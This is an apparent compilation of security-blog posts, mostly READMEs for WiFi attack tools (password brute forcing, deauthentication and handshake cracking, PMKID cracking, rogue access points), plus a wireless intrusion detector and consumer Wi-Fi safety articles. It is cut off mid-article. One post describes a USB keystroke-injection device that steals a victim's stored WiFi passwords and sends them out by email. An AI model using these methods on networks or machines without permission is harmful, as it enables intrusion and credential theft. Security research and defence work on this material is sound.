WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.

The packages are minimal or nearly none 😅. The package install command is:

pip install rich pyfiglet

Thats it.

So listing the features:

• Overall Features:
• We can use custom interfaces or non-default interfaces to run the attack.
• Well-defined way of using netsh and listing and utilizing targets.
• Upgradeability
• Code-Wise Features:
• Interactive menu-driven system with rich.
• versatility in using interface, targets, and password files.

So this is how the bruteforcer works:

• Provide Interface:

• The user is required to provide the network interface for the tool to use.

• By default, the interface is set to Wi-Fi.

• Search and Set Target:

• The user must search for and select the target network.

• During this process, the tool performs the following sub-steps:

  • Disconnects all active network connections for the selected interface.
  • Searches for all available networks within range.

• Input Password File:

• The user inputs the path to the password file.

• The default path for the password file is ./wordlist/default.txt.

• Run the Attack:

• With the target set and the password file ready, the tool is now prepared to initiate the attack.

• Attack Procedure:

• The attack involves iterating through each password in the provided file.
• For each password, the following steps are taken:
  • A custom XML configuration for the connection attempt is generated and stored.
  • The tool attempts to connect to the target network using the generated XML and the current password.
  • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
  • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
  • This loop continues until a successful ping response is received, indicating a successful connection attempt.

After installing all the packages just run python main.py rest is history 👍 make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:

For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.

Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Requirements

This software only works on linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any question about the usage of the application, do not hesitate to open a discussion

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.

Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

• Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
• In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
• In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

• Physical access to victim's computer.

• Unlocked victim's computer.

• Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

• Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need

• Raspberry Pi Pico (RPi Pico)
• Micro USB to USB Cable
• Jumper Wire (optional)
• pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
• USB flash drive (for the exploit over physical medium only)

Note:

• It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

• However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

• In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

• Exfiltration over the network medium.

• This approach was used for the Windows exploit. The whole payload can be seen here.

• Exfiltration over a physical medium.

• This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

 Note:

• After sending data over the email, the .txt file is deleted.

• You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

• Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

• Manually creating NetworkManager profiles in keyfile format
• Description of keyfile settings plugin

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

 Tip:

• Upload your payload to RPi Pico before you connect the pins.
• Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

• This pico-ducky currently works only on Windows OS.

• This attack requires physical access to an unlocked device in order to be successfully deployed.

• The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

• Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

• Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

• The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

• Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

• If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

• If the computer has a non-English Environment set, this exploit won't be successful.

• Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

• Fix Caps Lock bug.
• Fix non-English Environment bug.
• Obfuscate the command prompt.
• Implement exfiltration over a physical medium.
• Create a payload for Linux.
• Encode/Encrypt exfiltrated data before sending it over email.
• Implement indicator of successfully completed exploit.
• Implement command history clean-up for Linux exploit.
• Enhance the Linux exploit in order to avoid usage of sudo.

WiFi-Pineapple-MK7_REST-Client - WiFi Hacking Workflow With WiFi Pineapple Mark VII API

PINEAPPLE MARK VII REST CLIENT

• The leading rogue access point and WiFi pentest toolkit for close access operations.
• Passive and active attacks analyze vulnerable and misconfigured devices.
• https://hak5.org/collections/sale/products/wifi-pineapple

Author:: TW-D

Version:: 1.3.7

Copyright:: Copyright (c) 2022 TW-D

License:: Distributes under the same terms as Ruby

Doc:: https://hak5.github.io/mk7-docs/docs/rest/rest/

Requires:: Ruby >= 2.7.0p0 and Pineapple Mark VII >= 2.1.0-stable

Installation (Debian, Ubuntu, Raspbian)::

• sudo apt-get install build-essential curl g++ ruby ruby-dev

• sudo gem install net-ssh rest-client tty-progressbar

Description

Library allowing the automation of active or passive attack operations.

Note : "Issues" and "Pull Request" are welcome.

Payloads

In "./payloads/" directory, you will find :

Payload skeleton for development

#
# Title:            <TITLE>
#
# Description:      <DESCRIPTION>
#
#
# Author:           <AUTHOR>
# Version:          <VERSION>
# Category:         <CATEGORY>
#
# STATUS
# ======================
# <SHORT-DESCRIPTION> ... SETUP
# <SHORT-DESCRIPTION> ... ATTACK
# <SHORT-DESCRIPTION> ... SPECIAL
# <SHORT-DESCRIPTION> ... FINISH
# <SHORT-DESCRIPTION> ... CLEANUP
# <SHORT-DESCRIPTION> ... OFF
#

require_relative('<PATH-TO>/classes/PineappleMK7.rb')

system_authentication = PineappleMK7::System::Authentication.new
system_authentication.host = "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = 1471
system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"

if (system_authentication.login)

    led =    PineappleMK7::System::LED.new

    # SETUP
    #
    led.setup

    #
    # [...]
    #

    # ATTACK
    #
    led.attack

    #
    # [...]
    #

    # SPECIAL
    #
    led.special

    #
    # [...]
    #

    # FINISH
    #
    led.finish

    #
    # [...]
    #

    # CLEANUP
    #
    led.cleanup

    #
    # [...]
    #

    # OFF
    #
    led.off

end

Note : Don't hesitate to take inspiration from the payloads directory.

System modules

Authentication accessors/method

system_authentication = PineappleMK7::System::Authentication.new

system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = (integer) 1471
system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"

system_authentication.login()

LED methods

led = PineappleMK7::System::LED.new

led.setup()
led.failed()
led.attack()
led.special()
led.cleanup()
led.finish()
led.off()

Pineapple Modules

Dashboard

Notifications method

dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new

dashboard_notifications.clear()

Stats method

dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new

dashboard_stats.output()

Logging

System method

logging_system = PineappleMK7::Modules::Logging::System.new

logging_system.output()

PineAP

Clients methods

pineap_clients = PineappleMK7::Modules::PineAP::Clients.new

pineap_clients.connected_clients()
pineap_clients.previous_clients()
pineap_clients.kick( (string) mac )
pineap_clients.clear_previous()

EvilWPA accessors/method

evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new

evil_wpa.ssid = (string default:'PineAP_WPA')
evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')
evil_wpa.auth = (string default:'psk2+ccmp')
evil_wpa.password = (string default:'pineapplesareyummy')
evil_wpa.hidden = (boolean default:false)
evil_wpa.enabled = (boolean default:false)
evil_wpa.capture_handshakes = (boolean default:false)

evil_wpa.save()

Filtering methods

pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new

pineap_filtering.client_filter( (string) 'allow' | 'deny' )
pineap_filtering.add_client( (string) mac )
pineap_filtering.clear_clients()
pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )

Impersonation methods

pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new

pineap_impersonation.output()
pineap_impersonation.add_ssid( (string) ssid )
pineap_impersonation.clear_pool()

OpenAP method

open_ap = PineappleMK7::Modules::PineAP::OpenAP.new

open_ap.output()

Settings accessors/method

pineap_settings = PineappleMK7::Modules::PineAP::Settings.new

pineap_settings.enablePineAP = (boolean default:true)
pineap_settings.autostartPineAP = (boolean default:true)
pineap_settings.armedPineAP = (boolean default:false)
pineap_settings.ap_channel = (string default:'11')
pineap_settings.karma = (boolean default:false)
pineap_settings.logging = (boolean default:false)
pineap_settings.connect_notifications = (boolean default:false)
pineap_settings.disconnect_notifications = (boolean default:false)
pineap_settings.capture_ssids = (boolean default:false)
pineap_settings.beacon_responses = (boolean default:false)
pineap_settings.broadcast_ssid_pool = (boolean default:false)
pineap_settings.broadcast_ssid_pool_random = (boolean default:false)
pineap_settings.pineap_mac = (string default:system_authentication.mac)
pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')<   br/>pineap_settings.beacon_response_interval = (string default:'NORMAL')
pineap_settings.beacon_interval = (string default:'NORMAL')

pineap_settings.save()

Recon

Handshakes methods

recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new

recon_handshakes.start( (object) ap )
recon_handshakes.stop()
recon_handshakes.output()
recon_handshakes.download( (object) handshake, (string) destination )
recon_handshakes.clear()

Scanning methods

recon_scanning = PineappleMK7::Modules::Recon::Scanning.new

recon_scanning.start( (integer) scan_time )
recon_scanning.start_continuous( (boolean) autoHandshake )
recon_scanning.stop_continuous()
recon_scanning.output( (integer) scanID )
recon_scanning.tags( (object) ap )
recon_scanning.deauth_ap( (object) ap )
recon_scanning.delete( (integer) scanID )

Settings

Networking methods

settings_networking = PineappleMK7::Modules::Settings::Networking.new

settings_networking.interfaces()
settings_networking.client_scan( (string) interface )
settings_networking.client_connect( (object) network, (string) interface )
settings_networking.client_disconnect( (string) interface )
settings_networking.recon_interface( (string) interface )

Pinacolada - Wireless Intrusion Detection System For Hak5's WiFi Coconut

Pinacolada looks for typical IEEE 802.11 attacks and then informs you about them as quickly as possible. All this with the help of Hak5's WiFi Coconut, which allows it to listen for threats on all 14 channels in the 2.4GHz range simultaneously.

Supported 802.11 Attacks

Dependencies

MacOS (With PIP/Python and Homebrew package manager)

pip install flask
brew install wireshark

Linux (With PIP/Python and APT package manager)

pip install flask
apt install tshark

For both operating systems install the WiFi Coconut's userspace

Installation

# Download Pinacolada
git clone https://github.com/90N45-d3v/Pinacolada
cd Pinacolada

# Start Pinacolada
python main.py

Usage

Pinacolada will be accessible from your browser at 127.0.0.1:8888.
The default password is CoconutsAreYummy.
After you have logged in, you can see a dashboard on the start page and you should change the password in the settings tab.

E-Mail Notifications

If configured, Pinacolada will alert you to attacks via E-Mail. In order to send you an E-Mail, however, an E-Mail account for Pinacolada must be specified in the settings tab. To find the necessary information such as SMTP server and SMTP port, search the internet for your mail provider and how their SMTP servers are configured + how to use them. Here are some information about known providers:

Not fully tested!

Since I don't own a WiFi Coconut myself, I have to simulate their traffic. So if you encounter any problems, don't hesitate to contact me and open an issue.

New Wi-Fi Protocol Security Flaw Affecting Linux, Android and iOS Devices

Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database

Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and it's Probes, WPS information and a global view of all the APs seen.

           _   __  _             _  _     
__      __(_) / _|(_)         __| || |__  
\ \ /\ / /| || |_ | |        / _` || '_ \ 
 \ V  V / | ||  _|| |       | (_| || |_) |
  \_/\_/  |_||_|  |_| _____  \__,_||_.__/ 
                     |_____|          
                               by r4ulcl

Features

• Displays if a network is cloaked (hidden) even if you have the ESSID.
• Shows a detailed table of connected clients and their respective APs.
• Identifies client probes connected to APs, providing insight into potential security risks usin Rogue APs.
• Extracts handshakes for use with hashcat, facilitating password cracking.
• Displays identity information from enterprise networks, including the EAP method used for authentication.
• Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
• Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
• Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
• Upload files with capture folder or file. This option supports the use of wildcards (*) to select multiple files or folders.
• Docker version in Docker Hub to avoid dependencies.
• Obfuscated mode for demonstrations and conferences.
• Possibility to add static GPS data.

Install

From DockerHub (RECOMMENDED)

docker pull r4ulcl/wifi_db

Manual installation

Debian based systems (Ubuntu, Kali, Parrot, etc.)

Dependencies:

• python3
• python3-pip
• tshark
• hcxtools

sudo apt install tshark
sudo apt install python3 python3-pip

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make 
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt 

Arch

Dependencies:

• python3
• python3-pip
• tshark
• hcxtools

sudo pacman -S wireshark-qt
sudo pacman -S python-pip python

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make 
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt 

Usage

Scan with airodump-ng

Run airodump-ng saving the output with -w:

sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

Create the SQLite database using Docker

#Folder with captures
CAPTURESFOLDER=/home/user/wifi

# Output database
touch db.SQLITE

docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db

• -v $PWD/db.SQLITE:/db.SQLITE: To save de output in current folder db.SQLITE file
• -v $CAPTURESFOLDER:/captures/: To share the folder with the captures with the docker

Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, put the name of the capture without format.

python3 wifi_db.py scan-01

In the event that we have multiple captures we can load the folder in which they are directly. And with -d we can rename the output database.

python3 wifi_db.py -d database.sqlite scan-folder

Open database

The database can be open with:

• sqlitebrowser

Below is an example of a ProbeClientsConnected table.

Arguments

usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

positional arguments:
  capture               capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
                        be added. This option supports the use of wildcards (*) to select multiple files or folders.

options:
  -h, --help            show this help message and exit
  -v, --verbose         increase output verbosity
  --debug               increase output verbosity to debug
  -o, --obfuscated      Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
  -t LAT, --lat LAT     insert a fake lat in the new elements
  -n LON, --lon LON     insert a fake lon i   n the new elements
  --source [{aircrack-ng,kismet,wigle}]
                        source from capture data (default: aircrack-ng)
  -d DATABASE, --database DATABASE
                        output database, if exist append to the given database (default name: db.SQLITE)

Kismet

TODO

Wigle

TODO

Database

wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

• AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

• Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

• SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

• Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

• WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

• SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

• Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

• Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

• Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

Views

• ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

• ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

• ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

• HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

• HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

• IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

• SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.

TODO

• Aircrack-ng

• All in 1 file (and separately)

• Kismet

• Wigle

• install

• parse all files in folder -f --folder

• Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

• Support bash multi files: "capture*-1*"

• Script to delete client or AP from DB (mac). - (Whitelist)

• Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)

• Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

• Table Handhsakes and PMKID

• Hashcat hash format 22000

• Table files, if file exists skip (full path)

• Get HTTP POST passwords

• DNS querys

This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

Author

• Raúl Calvo Laorden (@r4ulcl)

License

GNU General Public License v3.0

Why You Need to Watch Out When Using Public Wi-Fi

If you’re like most people, you like to stay connected whether you are traveling or just on the go. That’s why it can be tempting to connect to free, public Wi-Fi networks, but you should know that these networks could open you up to some serious risks.

Public Wi-Fi networks often lack a security measure called encryption, which scrambles the information sent from your computer or device to the router so strangers cannot read it. Without this security measure in place, the information you send over these networks can potentially be intercepted by cybercrooks.

This information could include your banking and social media passwords, as well as your identity information. A nosy cybercriminal could also potentially snoop on you by watching which websites you visit, and what you type into web forms.

In fact, it is so easy to steal your information over unsecured networks cybercrooks sometimes set up malicious Wi-Fi hotspots in high-traffic areas, like airports, with the intention of grabbing users’ information.

That’s why if you have to connect when you’re away, you should only use secure and well-advertised Wi-Fi networks. You can usually tell if they use encryption because they require a password to join.

If you have to do something sensitive online, like check your bank account balance or make a purchase, try to stick to webpages that start with “HTTPS” rather than just “HTTP”. The “S” stands for secure and indicates that the site uses encryption to protect your data. You can also look for a green lock icon at the beginning of the browser address, which indicates that the website connection is secure.

If you are on your mobile phone, you can skip the Wi-Fi network altogether and connect using the cellular network. It is somewhat more secure since it’s harder for cybercrooks to sniff out your individual data from others on the network.

If you travel a lot, consider investing in a Virtual Private Network (VPN), which is a piece of software that allows you to create a secure connection to another network over the Internet. Anyone potentially trying to snoop on you will only see that you are connected to the VPN, and not what you are doing.

Of course, the most important thing is to remember that using public Wi-Fi is always risky, and requires some extra steps to protect your data.

Here are some more tips to help keep you safe:

• Think twice before connecting to any public Wi-Fi network, especially if it does not require a password to join.
• Avoid using free, public computers. Cybercriminals sometimes place compromised computers in legitimate Wi-Fi hotspots with the intention of spreading malware or stealing your data.
• Try to save sensitive transactions, like banking and online shopping, for your secure home or work networks.
• If you do use a public network, stick to sites that begin with “HTTPS” so you know they are secure. The HTTPS Everywhere browser extension can direct you to encrypted pages when available. Also, look for the green lock icon in the browser’s address bar.
• When using your laptop, make sure to turn off “sharing” of your folders and devices so no one else on the network can access them. A quick web search can tell you how to do this on your operating system.
• Use comprehensive security software and keep it up-to-date. If your software includes a firewall, make sure to enable it.

The post Why You Need to Watch Out When Using Public Wi-Fi appeared first on McAfee Blog.

The Best Way To Protect Your Online Identity

For many Aussies, identity theft was always something that happened to other people. People on TV, usually. But the recent spate of data breaches at Optus, Medibank and Energy Australia has made many of us pay far more attention than ever to one of the fastest growing crimes in our country.  

According to the Department of Home Affairs, 1 in 4 Aussies will be the victim of identity theft over the course of their lives with an annual economic impact of more than $2 billion. And with the financial fallout from the recent data breaches only just starting to be counted, these statistics will no doubt increase dramatically next year. 

What Actually Is Identity Theft? 

Identity theft is when a cybercriminal gains access to your personal information to steal money or gain other benefits. Armed with your personal info, they can apply for real identity documents in your name but with another person’s photograph. This enables them to then apply for loans or benefits in your name, sign up for memberships or even apply for credit cards. 

And it goes without saying that the financial and emotional fallout from identity theft can be huge. Since the Optus and Medibank hacking stories broke just a few months ago, there has been multiple stories of Aussie families who have had their identities stolen and who are in a world of pain. This Melbourne family who have had over $40,000 stolen from ATM withdrawals alone is just one example. 

What Do You Mean By Personal Information? 

Your personal information is any piece of information or data that can confirm who you are or how to find you. It may be a single piece of information, or several pieces used together. It’s often referred to as personally identifiable information (PII). So, it includes your name, parents’ name, address, date of birth, phone numbers, email address, usernames/passwords or passphrases, bank account details, school or university attended, location check-ins even RSVPS for events. 

Every time you register with a new shopping site or social media platform, you will be asked to share some personally identifiable information. However, what you share may be stolen or even misused – just think about the recent list of Australian companies who had their customers’ private information stolen by hackers. So that’s why you need to ensure you are only sharing your information with trusted online sites and take every possible step to protect your personal information online. 

How To Protect Your Online Identity 

While there are no guarantees in life, there are steps you can take to ensure your online identity is as safe as possible. Here are my top 5 tips: 

